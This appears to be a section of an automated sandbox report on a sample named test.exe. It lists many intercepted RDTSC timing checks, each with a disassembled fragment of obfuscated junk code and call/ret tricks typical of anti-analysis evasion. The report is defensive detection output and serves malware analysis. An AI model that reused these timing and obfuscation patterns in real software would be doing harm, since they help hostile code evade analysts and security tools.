              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9CB4A second address: E9CB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F403C75C8FDh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9CB66 second address: E9CB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7549E second address: E754B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F403C75C8F6h 0x0000000d jg 00007F403C75C8F6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E754B1 second address: E754C1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F403D12A5B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E754C1 second address: E754C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EA5830 second address: EA5846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F403D12A5BCh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EA80A1 second address: EA80A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABB96 second address: EABBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jne 00007F403D12A5B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCD3 second address: EABCDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F403C75C8F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCDE second address: EABCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCE4 second address: EABCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCEF second address: EABCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAC234 second address: EAC238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACB07 second address: EACB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jne 00007F403D12A5B8h 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push edi 0x0000001b js 00007F403D12A5BCh 0x00000021 jnc 00007F403D12A5B6h 0x00000027 pop edi 0x00000028 mov eax, dword ptr [eax] 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d pushad 0x0000002e popad 0x0000002f pop ecx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACCD5 second address: EACCD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACCD9 second address: EACCDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACCDF second address: EACCE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F403C75C8FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACE80 second address: EACEA8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F403D12A5BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F403D12A5C3h 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACEA8 second address: EACEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C8FFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD03D second address: EAD041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD7B1 second address: EAD7FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F403C75C8F8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 nop 0x00000026 push esi 0x00000027 jp 00007F403C75C8FCh 0x0000002d pop esi 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F403C75C8FDh 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD8E6 second address: EAD91B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F403D12A5D5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F403D12A5C3h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD91B second address: EAD91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EADA6D second address: EADA77 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EADA77 second address: EADA7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB0065 second address: EB006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB0184 second address: EB01F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F403C75C8F6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F403C75C8F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, 19384EA1h 0x00000030 mov edi, dword ptr [ebp+122D28AAh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F403C75C8F8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D20B0h], ecx 0x00000058 push 00000000h 0x0000005a mov esi, dword ptr [ebp+122D1D25h] 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB1E54 second address: EB1E5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB28ED second address: EB2908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2908 second address: EB2961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F403D12A5C5h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F403D12A5B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 xor esi, dword ptr [ebp+122D26D3h] 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D3822h] 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D2A96h], ecx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2961 second address: EB2965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2965 second address: EB296B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB296B second address: EB2971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2971 second address: EB2975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB3305 second address: EB336E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c jne 00007F403C75C8F9h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F403C75C8F8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F403C75C8F8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xchg eax, ebx 0x0000004b jp 00007F403C75C904h 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB336E second address: EB3372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB3372 second address: EB337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB337F second address: EB3385 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB3385 second address: EB338F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB45D9 second address: EB45DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB517C second address: EB5182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB5182 second address: EB51A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F403D12A5C8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB80A5 second address: EB80C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C909h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB8683 second address: EB8688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB8688 second address: EB868E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB9522 second address: EB9528 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB9528 second address: EB9569 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F403C75C8F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F403C75C905h 0x00000013 nop 0x00000014 jmp 00007F403C75C8FEh 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+12454B3Fh], ecx 0x00000021 push 00000000h 0x00000023 cld 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBA5A8 second address: EBA5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403D12A5BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBA5B9 second address: EBA5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB96BB second address: EB974B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, esi 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F403D12A5B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jl 00007F403D12A5B8h 0x00000032 mov edi, esi 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov di, dx 0x0000003e mov bx, A5E6h 0x00000042 mov eax, dword ptr [ebp+122D0FD1h] 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007F403D12A5B8h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 0000001Ah 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 sub bx, 8060h 0x00000067 push FFFFFFFFh 0x00000069 call 00007F403D12A5BAh 0x0000006e mov ebx, dword ptr [ebp+122D3966h] 0x00000074 pop ebx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b pop eax 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB974B second address: EB9764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBB5C4 second address: EBB5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC69E second address: EBC6AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC6AC second address: EBC6B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F403D12A5B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC6B6 second address: EBC6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC6BA second address: EBC724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F403D12A5B8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 or di, B080h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F403D12A5B8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov dword ptr [ebp+1247A2A5h], edx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F403D12A5C0h 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBF515 second address: EBF5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C903h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F403C75C8F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a mov esi, dword ptr [ebp+122D3832h] 0x00000030 call 00007F403C75C906h 0x00000035 mov edi, dword ptr [ebp+122D1D3Ah] 0x0000003b pop esi 0x0000003c popad 0x0000003d jmp 00007F403C75C908h 0x00000042 push 00000000h 0x00000044 jmp 00007F403C75C906h 0x00000049 xchg eax, esi 0x0000004a jmp 00007F403C75C8FAh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBF5B8 second address: EBF5BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBF5BE second address: EBF5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F403C75C8F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC15A5 second address: EC15AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC35D3 second address: EC35D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC35D7 second address: EC35F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC35F0 second address: EC360E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F403C75C8FCh 0x00000008 jnl 00007F403C75C8F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F403C75C8FBh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC4581 second address: EC4585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E707E4 second address: E707E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E707E9 second address: E707EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E707EF second address: E707F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC5756 second address: EC576A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F403D12A5BAh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC7C70 second address: EC7C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC7C7A second address: EC7C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC7C80 second address: EC7C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F403C75C8F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC7C8E second address: EC7CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F403D12A5B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 pushad 0x00000024 mov cx, si 0x00000027 mov esi, eax 0x00000029 popad 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F403D12A5B8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+1244B925h] 0x0000004c push eax 0x0000004d jbe 00007F403D12A5C2h 0x00000053 jng 00007F403D12A5BCh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8CFD second address: EC8D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C8FFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8D10 second address: EC8D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8D14 second address: EC8D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F403C75C8F8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D37CEh] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F403C75C8F8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov di, bx 0x00000048 push 00000000h 0x0000004a sbb di, 6261h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F403C75C902h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC7E03 second address: EC7E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ECB248 second address: ECB24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8F0A second address: EC8F1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
